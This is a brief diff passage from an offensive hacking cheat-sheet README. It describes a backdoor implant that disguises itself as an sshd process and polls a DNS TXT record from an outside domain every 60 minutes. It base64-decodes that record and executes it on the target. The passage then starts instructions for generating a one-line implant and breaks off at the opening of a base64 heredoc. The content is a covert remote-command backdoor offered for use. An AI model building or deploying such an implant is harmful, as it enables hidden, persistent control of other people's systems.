hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 - Depends on bash, dig and base64 only.
 - Hides as `sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups`
 - Requests a DNS TXT record every 60 minutes (from b00m2.team-teso.net).
-- Base64-decodes the TXT record and executes the command on the target.
+- Base64-decodes the TXT record and executes the command on the target. (the test command creates /tmp/.b00m).

 1. Modify the following to your liking and then Cut & Paste it to generate the 1-line implant.

 ```shell
 base64 -w0 >x.txt <<-'EOF'